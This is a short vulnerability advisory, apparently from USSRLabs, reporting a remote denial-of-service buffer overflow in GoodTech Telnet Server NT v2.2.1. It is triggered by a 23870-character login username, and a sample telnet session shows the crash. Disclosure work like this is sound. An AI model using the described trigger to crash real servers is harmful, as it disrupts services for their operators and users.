Remote DoS Attack in GoodTech Telnet Server NT v2.2.1 Vulnerability
   

GoodTech Telnet Server NT v2.2.1

GoodTech Telnet Server NT v2.2.1

 

 

PROBLEM:

UssrLabs found a Remote DoS Attack in GoodTech Telnet Server NT v2.2.1, the buffer overflow is caused by a long user name 23870

characters.

There is not much to expand on.... just a simple hole

Example:

[gimmemore@itsme]$ telnet example.com

Trying example.com...

Connected to example.com.

Escape character is '^]'.

Welcome to GoodTech Telnet Server for Windows NT (V2.2)

(Evaluation Copy)

(C) Copyright 1996-1999 GoodTech Systems, Inc.

Login username: (buffer)

Overflow Crashh.

Where (buffer) is 23870 characters.

Vendor Status:

Contacted. Vendor Url: http://www.goodtechsys.com/

Program Url: http://www.goodtechsys.com/products.htm

Credit:

USSRLABS

SOLUTION:

Nothing yet.

u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h